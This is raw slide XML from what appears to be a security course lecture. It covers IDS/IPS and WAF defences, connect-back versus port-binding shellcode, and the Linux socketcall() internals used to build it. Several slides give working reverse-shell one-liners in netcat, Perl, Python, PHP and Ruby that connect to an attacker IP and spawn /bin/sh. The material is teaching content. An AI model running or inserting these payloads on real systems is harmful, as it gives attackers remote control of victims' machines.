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3886198"/>
            <a:ext cx="9144000" cy="297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88619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2157751"/>
            <a:ext cx="77724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953037"/>
            <a:ext cx="77724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1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503572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503572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503572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633442"/>
            <a:ext cx="9144000" cy="12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633442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phrack.org/issues.html?id=7&amp;issue=6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pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners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Deep_packet_inspection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2157751"/>
            <a:ext cx="77724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 Hacking 104 + Exploitation Development 104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3953037"/>
            <a:ext cx="7772400" cy="125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Offensive Security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Spring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IDS / IPS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Network Intrusion Detection systems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2000"/>
              <a:t>independent platform for identifying intrusions via examining network traffic from multiple hosts (Snort)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Host-based intrusion detection systems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2000"/>
              <a:t>application/agent on a host monitors system calls, application logs, file system modifications, and other thost activities and states to identify intrusions. (Tripwire, OSSEC, etc...)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Stack-based Intrusion Detection System (rare)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2000"/>
              <a:t>OS - implemented TCP/IP stack level monitoring for intrusion detection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IDS / IPS rules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/>
              <a:t>Statistical anomaly based detection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determines normal levels for bandwidth, common protocols, common ports, common connections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alerts generated when anomalies occur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/>
              <a:t>Specification-based anomaly detection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designer hardcodes the normal levels and common ports / connections /etc...  (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>uncommon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)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alerts generated when unspecified behavior occurs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/>
              <a:t>Signature based detection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 sz="1800"/>
              <a:t>Monitors network packets for pre-determined / pre-configured attack patterns (known as signatures)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IDS / IPS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include or trigger custom tools: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honeypots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traffic payload manglers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Firewall reconfigurator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security environment modifier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Threat Levels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 Firewalls (WAF)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 appliance, server plugin, or filter that applies a set of rules to HTTP conversations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defend against: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SQLI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XSS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be very effective at mitigating most attacks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required for an industry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PCI DSS v1.1 (Payment Card Industry, Data Security Standard)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>often mandated for cases where web applications are not regularly code audited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IDS  vs WAF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45081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IDS / IPS is at Transport &amp; Network layer (usually)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WAF is at application Layer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68" y="1806139"/>
            <a:ext cx="3934433" cy="4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WAF users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Banks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Online shops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Customer/partner/employee portals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WAF Selection Criteria/Goals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Provides data sanity checking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Very few false positives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should NEVER disallow an authorized, valid request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685800" y="2157751"/>
            <a:ext cx="77724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Bypassing IDS / IPS and WAF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685800" y="3953037"/>
            <a:ext cx="7772400" cy="125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Connect-Back Shellcode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Port-binding shellcode is easily foiled by firewalls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Have the victim connect back to the attacker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Usually outbound connections are not limited or filtered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defeat IDS / IPS and WAF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sometimes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TCP connect back to attacker's IP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attacker must have a listener waiting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Networking Shellcode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some history....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According to the Shellcoder's Handbook (page 370), port-binding shellcode wasn't introduced to the public until 2005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BlackHat 2005 presentation by Michael Lynn on Cisco IOS bind shell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Cisco and ISS censored the talk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details were never published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Mainly b/c Cisco IOS doesn't implement system calls, so this was very impressive, and dangerous.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IDS / IPS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WAF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Defeating IDS / IPS &amp; WAF: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connect back shellcode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refresher on port binding shellcode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encoded/polymorphic shellcode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Actually networking shellcode articles surfaced on phrack and other sites at least a year earlier (2004)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http://www.phrack.org/issues.html?id=7&amp;issue=62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 back shellcode components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 listener on the attacker machine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exploit code to run on  victim machine that opens a port, connects back, and provides shell access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 back shellcode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anatomy of attack (IDS)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800" y="3358963"/>
            <a:ext cx="1350000" cy="15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284700"/>
            <a:ext cx="1739900" cy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908034" y="2721337"/>
            <a:ext cx="3433570" cy="370959"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="30394" w="205265">
                <a:moveTo>
                  <a:pt x="205265" y="28497"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="195969" y="23754"/>
                  <a:pt x="183701" y="-276"/>
                  <a:pt x="149491" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115280" y="356"/>
                  <a:pt x="24915" y="25335"/>
                  <a:pt x="0" y="303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3" name="Shape 173"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4304191" y="1972339"/>
            <a:ext cx="3272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Attacker exploits buffer overflow in web server, or web application code.  [Uses connect-back shellcode]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57226" y="2323825"/>
            <a:ext cx="2750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Firewall allows traffic, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IDS won't notice if it doesn't violate policies, and doesn't trigger a signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="175" name="Shape 175"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2210025" y="3063800"/>
            <a:ext cx="901200" cy="106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3462200" y="1565175"/>
            <a:ext cx="0" cy="5311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934" y="2636950"/>
            <a:ext cx="800100" cy="9742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>
            <a:off x="2191150" y="4733250"/>
            <a:ext cx="511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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3509625" y="4382300"/>
            <a:ext cx="2314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Firewall allows the outbound traffic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IDS will only notice if policy is violated, or signature is triggered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back shellcode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anatomy of attack (I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>S)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800" y="3358963"/>
            <a:ext cx="1350000" cy="15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284700"/>
            <a:ext cx="1739900" cy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3908034" y="2721337"/>
            <a:ext cx="3433570" cy="370959"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="30394" w="205265">
                <a:moveTo>
                  <a:pt x="205265" y="28497"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="195969" y="23754"/>
                  <a:pt x="183701" y="-276"/>
                  <a:pt x="149491" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115280" y="356"/>
                  <a:pt x="24915" y="25335"/>
                  <a:pt x="0" y="303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89" name="Shape 189"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4304191" y="1972339"/>
            <a:ext cx="3272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Attacker exploits buffer overflow in web server, or web application code.  [Uses connect-back shellcode]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57226" y="1752600"/>
            <a:ext cx="2750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Firewall allows traffic, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IPS won't notice if it doesn't violate policies, and doesn't trigger a signature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If it notices, may kill the traffic</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2210025" y="3063800"/>
            <a:ext cx="901200" cy="106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3462200" y="1565175"/>
            <a:ext cx="0" cy="5311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934" y="2636950"/>
            <a:ext cx="800100" cy="9742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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2191150" y="4733250"/>
            <a:ext cx="511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x="3509625" y="4077500"/>
            <a:ext cx="2314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Firewall allows the outbound traffic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IPS will only notice if policy is violated, or signature is triggered.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If IPS notices, may kill the connect-back shellcode connection (foiling the attack)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 assembly level connect back shells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netcat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commonly used to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>to incoming connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>nc -v -l -p 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>listen on port 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>-v = verbose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Using netcat to spawn a connect back shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nc -e /bin/sh &lt;target ip&gt; &lt;port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>so to set up a listener on attacker 192.168.1.166:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nc -v -l -p 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to connect back to attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nc -e /bin/sh 192.168.1.116 31337</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="36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connect back shellcode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(non asm)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http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet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http://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html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Perl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perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'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sz="1000"/>
              <a:t>replace 10.0.0.1 and p=1234 with attacker ip and port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Python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python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'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sz="1000"/>
              <a:t>again.... replace 10.0.0.1 and p=1234 with attacker ip and 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Other connect back shellcode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(non asm)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PHP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php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'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Ruby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ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'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we need to know how to write ASM connect back shellcode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For Science!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first a refresher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on port binding shellcode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to recap the networking details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port binding shellcode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anatomy of attack (IDS / IPS)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800" y="3358963"/>
            <a:ext cx="1350000" cy="15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284700"/>
            <a:ext cx="1739900" cy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3908034" y="2721337"/>
            <a:ext cx="3433570" cy="370959"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="30394" w="205265">
                <a:moveTo>
                  <a:pt x="205265" y="28497"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="195969" y="23754"/>
                  <a:pt x="183701" y="-276"/>
                  <a:pt x="149491" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115280" y="356"/>
                  <a:pt x="24915" y="25335"/>
                  <a:pt x="0" y="303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35" name="Shape 235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4304191" y="1972339"/>
            <a:ext cx="3272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Attacker exploits buffer overflow in web server, or web application code.  [Uses port-binding shellcode]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57226" y="1752600"/>
            <a:ext cx="2750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Firewall allows traffic, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>IDS / IPS won't notice if it doesn't violate policies, and doesn't trigger a signature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If IPS notices, may kill the traffic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2210025" y="3063800"/>
            <a:ext cx="901200" cy="106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" name="Shape 238"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3462200" y="1565175"/>
            <a:ext cx="0" cy="5311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934" y="2636950"/>
            <a:ext cx="800100" cy="9742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hape 240"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2191150" y="4733250"/>
            <a:ext cx="511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241" name="Shape 241"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3509625" y="3772700"/>
            <a:ext cx="2314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Firewall or IDS / IPS will kill the incoming connection most of the time by default.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causes much difficulty for an attacker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x="3264275" y="4543550"/>
            <a:ext cx="436200" cy="53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/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3245325" y="4458175"/>
            <a:ext cx="369900" cy="48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Network Intrusion Detection/Prevention Systems:  (IDS / IPS)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45081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Primarily defend against transport &amp; network level attacks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monitors for malicious activity or policy violations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reports to a management station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usually @ per packet basis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68" y="1806139"/>
            <a:ext cx="3934433" cy="4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Refresher (port binding c program)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121200" y="1567950"/>
            <a:ext cx="39270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These familiar socket functions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all can be accessed with a single Linux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system call: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socketcall()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lvl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall number 102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refresher (socketcall()   )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SOCKETCALL(2)              Linux Programmer's Manual             SOCKETCALL(2)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socketcall - socket system calls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SYNOPSIS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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t> int socketcall(int call, unsigned long *args);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DESCRIPTION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socketcall()  is  a  common  kernel  entry  point for the socket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calls.  call determines which socket function to invoke.   args  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to a block containing the actual arguments, which are passed through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the appropriate call.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User programs should call the  appropriate  functions  by  their  usual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names.   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200"/>
              <a:t>Only  standard library implementors and kernel hackers need to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       know about socketcall().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6194025" y="6108650"/>
            <a:ext cx="2504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They said it themselves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Refresher (networking system calls)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These are the options for the 1st arg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for socketcall()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define SYS_SOCKET      1               /* sys_socket(2) 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SYS_BIND        2               /* sys_bind(2)   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SYS_CONNECT     3               /* sys_connect(2)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SYS_LISTEN      4               /* sys_listen(2) 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SYS_ACCEPT      5               /* sys_accept(2) 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SYS_GETSOCKNAME 6               /* sys_getsockname(2)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SYS_GETPEERNAME 7               /* sys_getpeername(2)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SYS_SOCKETPAIR  8               /* sys_socketpair(2)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SYS_SEND        9               /* sys_send(2)   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SYS_RECV        10              /* sys_recv(2)   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SYS_SENDTO      11              /* sys_sendto(2) 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SYS_RECVFROM    12              /* sys_recvfrom(2)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SYS_SHUTDOWN    13              /* sys_shutdown(2)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SYS_SETSOCKOPT  14              /* sys_setsockopt(2)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SYS_GETSOCKOPT  15              /* sys_getsockopt(2)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SYS_SENDMSG     16              /* sys_sendmsg(2)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SYS_RECVMSG     17              /* sys_recvmsg(2)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#define SYS_ACCEPT4     18              /* sys_accept4(2)               */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577442" y="2618000"/>
            <a:ext cx="38415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int socketcall(int call, unsigned long *args);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="265" name="Shape 265"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6184525" y="2902550"/>
            <a:ext cx="920100" cy="79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6" name="Shape 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922975" y="1669450"/>
            <a:ext cx="1090825" cy="5169575"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="206783" w="43633">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26559" y="12900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26179" y="78160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43633" y="81195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30732" y="87646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38700" y="183259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11003" y="206783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67" name="Shape 267"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7958200" y="2902550"/>
            <a:ext cx="9600" cy="10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x="6526005" y="3917500"/>
            <a:ext cx="2333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Vary depending on the corresponding int call #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to shellcode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 EAX = 102 for socketcall()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EBX contains the type of socket call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ECX contains a pointer to the socket call's arguments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then int 0x80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Simple enough, but other parts get tricky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sockaddr structure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Refresher (port binding c program)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274025" y="1647325"/>
            <a:ext cx="41736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The circled code is responsible for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building the sockaddr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>
              <a:solidFill>
                <a:schemeClr val="accent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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct sockaddr_in {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    short            sin_family;   // e.g. AF_INET, AF_INET6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    unsigned short   sin_port;     // e.g. htons(3490)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    struct in_addr   sin_addr;     // see struct in_addr, below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    char             sin_zero[8];  // zero this if you want to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};</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200"/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7E7E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>
              <a:solidFill>
                <a:schemeClr val="accent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69150" y="3614297"/>
            <a:ext cx="5852550" cy="1963547"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="72469" w="234102">
                <a:moveTo>
                  <a:pt x="53498" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18212" y="5691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28077"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3415" y="62604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16695" y="71710"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162771" y="72469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226134" y="68295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="234102" y="46289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227652" y="29215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202231" y="2656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118758" y="1517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Disassembly view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5691287" y="3120725"/>
            <a:ext cx="3196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 DWORD PTR [esp+8], 0x0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 DWORD PTR [esp+4], 0x1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 DWORD PTR [esp], 0x2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  0x8048394 &lt;socket@plt&gt;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127625" y="4277950"/>
            <a:ext cx="25230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Arguments are pushed on the stack in reverse order,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so PF_INET = 2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and SOCK_STREAM = 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Disassembly view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691287" y="3120725"/>
            <a:ext cx="3196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 WORD PTR [ebp-40], 0x2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127625" y="4277950"/>
            <a:ext cx="25230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so,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AF_INET =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Disassembly view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691287" y="3120725"/>
            <a:ext cx="3196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 DWORD PTR [esp], 0x7a69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  0x8048374 &lt;htons@plt&gt;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127625" y="4277950"/>
            <a:ext cx="25230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0x7a69 is hex for 31337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but htons reverses the byte order.  So it becomes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0x697a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Disassembly view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691287" y="3120725"/>
            <a:ext cx="3196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INADDR_ANY will be 0.0.0.0 in memory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0x00   0x00    0x00    0x00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127625" y="4277950"/>
            <a:ext cx="25230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This is a lot of nullbytes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25" y="1651100"/>
            <a:ext cx="76866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4026498" y="2608175"/>
            <a:ext cx="47808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 u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host_addr is a sockaddr_in struct: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accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct sockaddr_in {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short            sin_family;   // e.g. AF_INET, AF_INET6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unsigned short   sin_port;     // e.g. htons(3490)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struct in_addr   sin_addr;     // see struct in_addr, below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char             sin_zero[8];  // zero this if you want to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IDS / IPS packet inspection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45081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60000"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Stateful Packet Inspection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>scan TCP / UDP headers for incoming and outgoing packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>protocol noncompliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>forms a state model for each connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for each SYN packet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/>
              <a:t>prevents certain kinds of denial of service attacks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68" y="1806139"/>
            <a:ext cx="3934433" cy="4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691287" y="3120725"/>
            <a:ext cx="3196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0x0002 for AF_INET  (short)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25" y="1651100"/>
            <a:ext cx="7686675" cy="9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>
            <a:off x="3718300" y="2371375"/>
            <a:ext cx="2001300" cy="986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5691287" y="3120725"/>
            <a:ext cx="3196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(little endian)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0x697a for network reverse order 31337  (short)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25" y="1651100"/>
            <a:ext cx="7686675" cy="9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Shape 340"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5217000" y="2428275"/>
            <a:ext cx="607200" cy="1252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691287" y="3120725"/>
            <a:ext cx="3196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(little endian)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0.0.0.0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any ip address.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25" y="1651100"/>
            <a:ext cx="7686675" cy="9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Shape 349"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5814750" y="2418800"/>
            <a:ext cx="37800" cy="1261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0" name="Shape 350"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5919625" y="2409300"/>
            <a:ext cx="2228400" cy="1271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25" y="1651100"/>
            <a:ext cx="76866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5097723" y="2949975"/>
            <a:ext cx="42306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 u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>host_addr is a sockaddr_in struct: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6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>struct sockaddr_in {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short            sin_family;   // e.g. AF_INET, AF_INET6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unsigned short   sin_port;     // e.g. htons(3490)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struct in_addr   sin_addr;     // see struct in_addr, below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char             sin_zero[8];  // zero this if you want to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};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5852550" y="2418800"/>
            <a:ext cx="550200" cy="1574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0" name="Shape 360"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5097723" y="2418800"/>
            <a:ext cx="925500" cy="1422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1" name="Shape 361"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3703998" y="2372025"/>
            <a:ext cx="1579500" cy="1279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2" name="Shape 362"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6886425" y="2390350"/>
            <a:ext cx="1394400" cy="1612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Towards (port-binding) shellcode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 know how to call socketcall()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 know what the sockaddr_in struct should look like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Now we need to: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bind to port 31337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listen to port 31337 for incoming connections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accept TCP connections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shellcode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4572000" y="1603050"/>
            <a:ext cx="44772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1447800"/>
            <a:ext cx="41034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945950" y="1878137"/>
            <a:ext cx="701925" cy="4733138"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="182500" w="28077">
                <a:moveTo>
                  <a:pt x="0" y="182500"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2972" y="180033"/>
                  <a:pt x="14544" y="178390"/>
                  <a:pt x="17833" y="167703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21121" y="157016"/>
                  <a:pt x="19350" y="141838"/>
                  <a:pt x="19730" y="118378"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20109" y="94917"/>
                  <a:pt x="18718" y="46667"/>
                  <a:pt x="20110" y="26938"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21501" y="7208"/>
                  <a:pt x="26749" y="4489"/>
                  <a:pt x="28077" y="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lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="stealth"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036800" y="5757675"/>
            <a:ext cx="4202064" cy="1024434"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/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Breathe deep.  Don't panic!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(reminder) The shellcode mimics this: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111400" y="1600200"/>
            <a:ext cx="39270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These familiar socket functions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all can be accessed with a single Linux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system call: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socketcall()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b="1" lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall number 102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Piece by piece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572000" y="1603050"/>
            <a:ext cx="44772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447800"/>
            <a:ext cx="41034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945950" y="1878137"/>
            <a:ext cx="701925" cy="4733138"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="182500" w="28077">
                <a:moveTo>
                  <a:pt x="0" y="182500"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2972" y="180033"/>
                  <a:pt x="14544" y="178390"/>
                  <a:pt x="17833" y="167703"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21121" y="157016"/>
                  <a:pt x="19350" y="141838"/>
                  <a:pt x="19730" y="118378"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20109" y="94917"/>
                  <a:pt x="18718" y="46667"/>
                  <a:pt x="20110" y="26938"/>
